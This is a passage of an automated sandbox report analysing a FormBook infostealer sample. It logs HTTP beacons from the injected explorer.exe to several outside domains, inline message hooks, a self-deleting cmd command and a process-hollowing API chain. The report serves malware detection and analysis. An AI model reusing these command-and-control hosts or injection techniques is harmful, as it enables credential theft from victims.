                                                                                                              Data Ascii:
                                                                                                              Oct 26, 2023 09:49:40.089878082 CEST137INData Raw: 52 51 6b 30 77 56 57 5a 43 4d 33 5a
                                                                                                              Data Ascii: RQk0wVWZCM3Z
                                                                                                              Oct 26, 2023 09:49:40.089899063 CEST138INData Raw: 55 54 45 52 79 65 6e 5a 35 52 48 42 6c 57 58 5a 36 56 46 4e 53 5a 6a 56 4c 56 45 46 34 4d 6c 6c 47 54 45 46 6d 51 6b 73 79 64 44 6c 6f 59 55 35 4a 65 6a 42 31 54 6b 34 72 63 6b 52 4f 5a 57 70 6e 4f 58 67 79 52 6b 6c 55 65 6c 55 31 51 6d 4a 6c 57
                                                                                                              Data Ascii: UTERyenZ5RHBlWXZ6VFNSZjVLVEF4MllGTEFmQksydDloYU5JejB1Tk4rckROZWpnOXgyRklUelU1QmJlWDVWTDEyQnpmMERpYk0iLCJtYWMiOiI5YmExNGY1OTM4MzE1MTBhZWJhNWNlYzJmZGQ3YjU2NzYxZTJkZTdjZjMwNDE0NjA2NDU5NTFkNjQ3NWE4MDU2IiwidGFnIjoiIn0%3D; expires=Thu, 09-Nov-2023 0
                                                                                                              Oct 26, 2023 09:49:40.089915991 CEST138INData Raw: 31 36 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d
                                                                                                              Data Ascii: 16e<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://www.candicrem.com/4hc5'" /> <title>Redirecting to https://www.candicrem.com/4hc5</title> </head>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              7192.168.2.44975334.68.234.480C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Oct 26, 2023 09:50:00.519356966 CEST139OUTGET /4hc5/?ntxh9=V48LzvX0&P6=qEWXZ3aqpcDZ/jSVREtayCI8W2IV6onyeM8faOppXvrhittFNUzvbhLP7PFzXYy9ta8e HTTP/1.1
                                                                                                              Host: www.therenixgroupllc.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Oct 26, 2023 09:50:00.645550013 CEST139INHTTP/1.1 301 Moved Permanently
                                                                                                              Server: openresty
                                                                                                              Date: Thu, 26 Oct 2023 07:50:00 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 166
                                                                                                              Connection: close
                                                                                                              Location: https://www.therenixgroupllc.com/4hc5/?ntxh9=V48LzvX0&P6=qEWXZ3aqpcDZ/jSVREtayCI8W2IV6onyeM8faOppXvrhittFNUzvbhLP7PFzXYy9ta8e
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              8192.168.2.449754154.86.64.9680C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Oct 26, 2023 09:50:21.217299938 CEST140OUTGET /4hc5/?P6=sJ+Ygj3voyzHV2SMJ+QMiTEgoYfBBcQbem66ypT0eUfc0EimMlq1mWlKocPRS2y/b4Gk&ntxh9=V48LzvX0 HTTP/1.1
                                                                                                              Host: www.7141999.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Oct 26, 2023 09:50:21.514841080 CEST141INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx
                                                                                                              Date: Thu, 26 Oct 2023 07:50:22 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 146
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              9192.168.2.449755167.172.228.2680C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Oct 26, 2023 09:50:41.435579062 CEST141OUTGET /4hc5/?ntxh9=V48LzvX0&P6=YIoXQxIAORK6HEHBIjyMxPOX2glibAcKMS7MvCp7xLT7Ek+j4imqU/IlDY2a3gBqxYgb HTTP/1.1
                                                                                                              Host: www.pacersun.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Oct 26, 2023 09:50:41.637140036 CEST142INHTTP/1.1 404
                                                                                                              Server: nginx/1.20.1
                                                                                                              Date: Thu, 26 Oct 2023 07:50:41 GMT
                                                                                                              Content-Length: 0
                                                                                                              Connection: close


                                                                                                              Code Manipulations

                                                                                                              Function NameHook TypeActive in Processes
                                                                                                              PeekMessageAINLINEexplorer.exe
                                                                                                              PeekMessageWINLINEexplorer.exe
                                                                                                              GetMessageWINLINEexplorer.exe
                                                                                                              GetMessageAINLINEexplorer.exe
                                                                                                              Function NameHook TypeNew Data
                                                                                                              PeekMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE1
                                                                                                              PeekMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE1
                                                                                                              GetMessageWINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xE1
                                                                                                              GetMessageAINLINE0x48 0x8B 0xB8 0x86 0x6E 0xE1

                                                                                                              Click to jump to process

                                                                                                              Click to jump to process

                                                                                                              Click to dive into process behavior distribution

                                                                                                              Click to jump to process

                                                                                                              Target ID:0
                                                                                                              Start time:09:46:36
                                                                                                              Start date:26/10/2023
                                                                                                              Path:C:\Users\user\Desktop\881SP1exr1.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\Desktop\881SP1exr1.exe
                                                                                                              Imagebase:0xa80000
                                                                                                              File size:582'656 bytes
                                                                                                              MD5 hash:FC8B3A3005CDC80CE19AF33A57010FA8
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:2
                                                                                                              Start time:09:46:38
                                                                                                              Start date:26/10/2023
                                                                                                              Path:C:\Users\user\Desktop\881SP1exr1.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\Desktop\881SP1exr1.exe
                                                                                                              Imagebase:0x7e0000
                                                                                                              File size:582'656 bytes
                                                                                                              MD5 hash:FC8B3A3005CDC80CE19AF33A57010FA8
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Target ID:3
                                                                                                              Start time:09:46:38
                                                                                                              Start date:26/10/2023
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                                              Imagebase:0x7ff72b770000
                                                                                                              File size:5'141'208 bytes
                                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:false

                                                                                                              Target ID:4
                                                                                                              Start time:09:46:41
                                                                                                              Start date:26/10/2023
                                                                                                              Path:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                              Imagebase:0x330000
                                                                                                              File size:23'040 bytes
                                                                                                              MD5 hash:B4016BEE9D8F3AD3D02DD21C3CAFB922
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                              Reputation:moderate
                                                                                                              Has exited:false

                                                                                                              Target ID:5
                                                                                                              Start time:09:46:44
                                                                                                              Start date:26/10/2023
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:/c del "C:\Users\user\Desktop\881SP1exr1.exe"
                                                                                                              Imagebase:0x240000
                                                                                                              File size:236'544 bytes
                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Target ID:6
                                                                                                              Start time:09:46:44
                                                                                                              Start date:26/10/2023
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                              File size:862'208 bytes
                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high
                                                                                                              Has exited:true

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:10%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:135
                                                                                                                Total number of Limit Nodes:15
                                                                                                                execution_graph 24497 78d9ae8 24498 78d9c73 24497->24498 24499 78d9b0e 24497->24499 24499->24498 24502 78d9df8 24499->24502 24507 78d9d68 PostMessageW 24499->24507 24503 78d9d9b PostMessageW 24502->24503 24506 78d9dff 24502->24506 24505 78d9dd4 24503->24505 24505->24499 24508 78d9dd4 24507->24508 24508->24499 24543 15e4668 24544 15e467a 24543->24544 24545 15e4686 24544->24545 24547 15e4779 24544->24547 24548 15e479d 24547->24548 24552 15e4888 24548->24552 24556 15e4879 24548->24556 24553 15e48af 24552->24553 24554 15e498c 24553->24554 24560 15e44c4 24553->24560 24557 15e48af 24556->24557 24558 15e44c4 CreateActCtxA 24557->24558 24559 15e498c 24557->24559 24558->24559 24561 15e5918 CreateActCtxA 24560->24561 24563 15e59db 24561->24563 24564 78d8d15 24566 78d8b99 24564->24566 24565 78d8c55 24566->24565 24569 78d8e68 24566->24569 24575 78d8e78 24566->24575 24570 78d8e96 24569->24570 24571 78d8e8b 24570->24571 24581 78d913d 24570->24581 24597 78d9316 24570->24597 24571->24565 24572 78d8f9f 24572->24565 24576 78d8e8b 24575->24576 24577 78d8e96 24575->24577 24576->24565 24577->24576 24579 78d913d 10 API calls 24577->24579 24580 78d9316 10 API calls 24577->24580 24578 78d8f9f 24578->24565 24579->24578 24580->24578 24614 78d87f4 24581->24614 24618 78d8800 24581->24618 24582 78d9183 24583 78d9430 24582->24583 24584 78d91f0 24582->24584 24595 78d8178 Wow64SetThreadContext 24582->24595 24596 78d8180 Wow64SetThreadContext 24582->24596 24583->24572 24584->24583 24585 78d80d0 ResumeThread 24584->24585 24586 78d8308 WriteProcessMemory 24584->24586 24587 78d8318 WriteProcessMemory 24584->24587 24588 78d8570 WriteProcessMemory 24584->24588 24591 78d8668 ReadProcessMemory 24584->24591 24592 78d8662 ReadProcessMemory 24584->24592 24593 78d8178 Wow64SetThreadContext 24584->24593 24594 78d8180 Wow64SetThreadContext 24584->24594 24585->24584 24586->24584 24587->24584 24588->24584 24591->24584 24592->24584 24593->24584 24594->24584 24595->24584 24596->24584 24622 78d8258 24597->24622 24626 78d8251 24597->24626 24598 78d9338 24600 78d9430 24598->24600 24630 78d8308 24598->24630 24635 78d8318 24598->24635 24640 78d8570 24598->24640 24599 78d921f 24599->24600 24605 78d8308 WriteProcessMemory 24599->24605 24612 78d8318 WriteProcessMemory 24599->24612 24613 78d8570 WriteProcessMemory 24599->24613 24644 78d8178 24599->24644 24648 78d8180 24599->24648 24652 78d8668 24599->24652 24656 78d8662 24599->24656 24660 78d80d0 24599->24660 24600->24572 24605->24599 24612->24599 24613->24599 24615 78d8800 CreateProcessA 24614->24615 24617 78d8a4b 24615->24617 24617->24617 24619 78d8889 CreateProcessA 24618->24619 24621 78d8a4b 24619->24621 24621->24621 24623 78d8298 VirtualAllocEx 24622->24623 24625 78d82d5 24623->24625 24625->24598 24627 78d8298 VirtualAllocEx 24626->24627 24629 78d82d5 24627->24629 24629->24598 24632 78d834c 24630->24632 24631 78d839f 24631->24599 24632->24631 24633 78d85e6 WriteProcessMemory 24632->24633 24634 78d8617 24633->24634 24634->24599 24637 78d834c 24635->24637 24636 78d839f 24636->24599 24637->24636 24638 78d85e6 WriteProcessMemory 24637->24638 24639 78d8617 24638->24639 24639->24599 24641 78d85c0 WriteProcessMemory 24640->24641 24643 78d8617 24641->24643 24643->24599 24645 78d81c5 Wow64SetThreadContext 24644->24645 24647 78d820d 24645->24647 24647->24599 24649 78d81c5 Wow64SetThreadContext 24648->24649 24651 78d820d 24649->24651 24651->24599 24653 78d86b3 ReadProcessMemory 24652->24653 24655 78d86f7 24653->24655 24655->24599 24657 78d86b3 ReadProcessMemory 24656->24657 24659 78d86f7 24657->24659 24659->24599 24661 78d8110 ResumeThread 24660->24661 24663 78d8141 24661->24663 24663->24599 24509 15eac50 24513 15ead38 24509->24513 24521 15ead48 24509->24521 24510 15eac5f 24514 15ead59 24513->24514 24515 15ead7c 24513->24515 24514->24515 24529 15eafd0 24514->24529 24533 15eafe0 24514->24533 24515->24510 24516 15ead74 24516->24515 24517 15eaf80 GetModuleHandleW 24516->24517 24518 15eafad 24517->24518 24518->24510 24522 15ead59 24521->24522 24523 15ead7c 24521->24523 24522->24523 24527 15eafd0 LoadLibraryExW 24522->24527 24528 15eafe0 LoadLibraryExW 24522->24528 24523->24510 24524 15ead74 24524->24523 24525 15eaf80 GetModuleHandleW 24524->24525 24526 15eafad 24525->24526 24526->24510 24527->24524 24528->24524 24530 15eaff4 24529->24530 24531 15eb019 24530->24531 24537 15ea0d0 24530->24537 24531->24516 24534 15eaff4 24533->24534 24535 15ea0d0 LoadLibraryExW 24534->24535 24536 15eb019 24534->24536 24535->24536 24536->24516 24538 15eb1c0 LoadLibraryExW 24537->24538 24540 15eb239 24538->24540 24540->24531 24541 15ed630 DuplicateHandle 24542 15ed6c6 24541->24542 24664 15ecfe0 24665 15ed026 GetCurrentProcess 24664->24665 24667 15ed078 GetCurrentThread 24665->24667 24668 15ed071 24665->24668 24669 15ed0ae 24667->24669 24670 15ed0b5 GetCurrentProcess 24667->24670 24668->24667 24669->24670 24671 15ed0eb 24670->24671 24672 15ed113 GetCurrentThreadId 24671->24672 24673 15ed144 24672->24673
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0f3f802f4b370bd29cbf6296ef67c3a79e1d3acfc24f9a45be9de057588da4c4
                                                                                                                • Instruction ID: bfc9b5f33bfb113bf15fb33cc9297cc0769a45e71b7759ba95b69a01c30f683a
                                                                                                                • Opcode Fuzzy Hash: 0f3f802f4b370bd29cbf6296ef67c3a79e1d3acfc24f9a45be9de057588da4c4
                                                                                                                • Instruction Fuzzy Hash: FE51C3B4E051199FCB04CFAAD5849AEFBF2BF99300F25D166E418A7315DB30A942CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c394a35a07f2d5f7c521b1f057fadc4a1b135a0d7a2c0ffe9bee195abbfe34ae
                                                                                                                • Instruction ID: d92df877ad97768607e210a7ed6c4561555e39c091704a9e71153bc8078b27f6
                                                                                                                • Opcode Fuzzy Hash: c394a35a07f2d5f7c521b1f057fadc4a1b135a0d7a2c0ffe9bee195abbfe34ae
                                                                                                                • Instruction Fuzzy Hash: 2941B4B5E015199FDB08CFAAD584A9EFBF2AF88310F14C166E418E7325DB309942CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 294 15ecfd0-15ed06f GetCurrentProcess 299 15ed078-15ed0ac GetCurrentThread 294->299 300 15ed071-15ed077 294->300 301 15ed0ae-15ed0b4 299->301 302 15ed0b5-15ed0e9 GetCurrentProcess 299->302 300->299 301->302 303 15ed0eb-15ed0f1 302->303 304 15ed0f2-15ed10d call 15ed5b8 302->304 303->304 308 15ed113-15ed142 GetCurrentThreadId 304->308 309 15ed14b-15ed1ad 308->309 310 15ed144-15ed14a 308->310 310->309
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 015ED05E
                                                                                                                • GetCurrentThread.KERNEL32 ref: 015ED09B
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 015ED0D8
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 015ED131
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1643619835.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_15e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: 687f6662c0acd6f89f620c1446a80f293af342623a17dbc96b3f0e885eb3a27c
                                                                                                                • Instruction ID: b7864d55723c97c751aec9ecb9a35d4b1110055b89e69329480d1aa976b042ea
                                                                                                                • Opcode Fuzzy Hash: 687f6662c0acd6f89f620c1446a80f293af342623a17dbc96b3f0e885eb3a27c
                                                                                                                • Instruction Fuzzy Hash: 005147B0D002498FDB18DFA9D548BDEBFF1BB48304F24845AE419AB260DB749985CF66
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 317 15ecfe0-15ed06f GetCurrentProcess 321 15ed078-15ed0ac GetCurrentThread 317->321 322 15ed071-15ed077 317->322 323 15ed0ae-15ed0b4 321->323 324 15ed0b5-15ed0e9 GetCurrentProcess 321->324 322->321 323->324 325 15ed0eb-15ed0f1 324->325 326 15ed0f2-15ed10d call 15ed5b8 324->326 325->326 330 15ed113-15ed142 GetCurrentThreadId 326->330 331 15ed14b-15ed1ad 330->331 332 15ed144-15ed14a 330->332 332->331
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 015ED05E
                                                                                                                • GetCurrentThread.KERNEL32 ref: 015ED09B
                                                                                                                • GetCurrentProcess.KERNEL32 ref: 015ED0D8
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 015ED131
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1643619835.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_15e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$ProcessThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2063062207-0
                                                                                                                • Opcode ID: 0de0a06414f18822d2d62d84e9437e4255ff378a96668977e3bf659e9c8666ac
                                                                                                                • Instruction ID: ebe0ac5c71813b9521df1c54cd7b3a3245fc506d2da42d5af10ca6abc1fc04c2
                                                                                                                • Opcode Fuzzy Hash: 0de0a06414f18822d2d62d84e9437e4255ff378a96668977e3bf659e9c8666ac
                                                                                                                • Instruction Fuzzy Hash: E25158B0D002498FDB18DFA9D548BDEBFF1BB88304F24C459E419AB260DB749984CF66
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 750 78d8318-78d8346 751 78d83ed-78d83f0 750->751 752 78d834c-78d8362 750->752 755 78d843c-78d843f 751->755 756 78d83f2-78d83fa 751->756 753 78d855d-78d85c6 752->753 754 78d8368-78d8370 752->754 772 78d85c8-78d85d4 753->772 773 78d85d6-78d8615 WriteProcessMemory 753->773 754->753 759 78d8376-78d8386 754->759 757 78d8555-78d855c 755->757 758 78d8445-78d845b 755->758 760 78d83fc-78d83fe 756->760 761 78d8408-78d842e 756->761 758->753 762 78d8461-78d8469 758->762 759->753 763 78d838c-78d8399 759->763 760->761 761->753 778 78d8434-78d8437 761->778 762->753 765 78d846f-78d847c 762->765 763->753 766 78d839f-78d83b6 763->766 765->753 769 78d8482-78d8492 765->769 770 78d83bd 766->770 771 78d83b8-78d83bb 766->771 769->753 776 78d8498-78d84b5 769->776 775 78d83bf-78d83e8 770->775 771->775 772->773 780 78d861e-78d864e 773->780 781 78d8617-78d861d 773->781 775->757 776->753 779 78d84bb-78d84c3 776->779 778->757 779->753 782 78d84c9-78d84d9 779->782 781->780 782->753 784 78d84df-78d84ec 782->784 784->753 787 78d84ee-78d8505 784->787 789 78d850a-78d8548 787->789 790 78d8507 787->790 798 78d854d 789->798 799 78d854a 789->799 790->789 798->757 799->798
                                                                                                                APIs
                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 078D8608
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1648587532.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_78d0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3559483778-0
                                                                                                                • Opcode ID: a4ea70d0e445f7958a87901be3961c0ec4b180bb8684569762f79847cac047d5
                                                                                                                • Instruction ID: ed51770a1c8d1c4123523b64a07688a359755c7ddfca2343ad0a865e213afc45
                                                                                                                • Opcode Fuzzy Hash: a4ea70d0e445f7958a87901be3961c0ec4b180bb8684569762f79847cac047d5
                                                                                                                • Instruction Fuzzy Hash: 9DA1CBB1A005258FCB04CF2DC88066EFBF6BB89310F548A69D469DB259C774EC41CBD4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
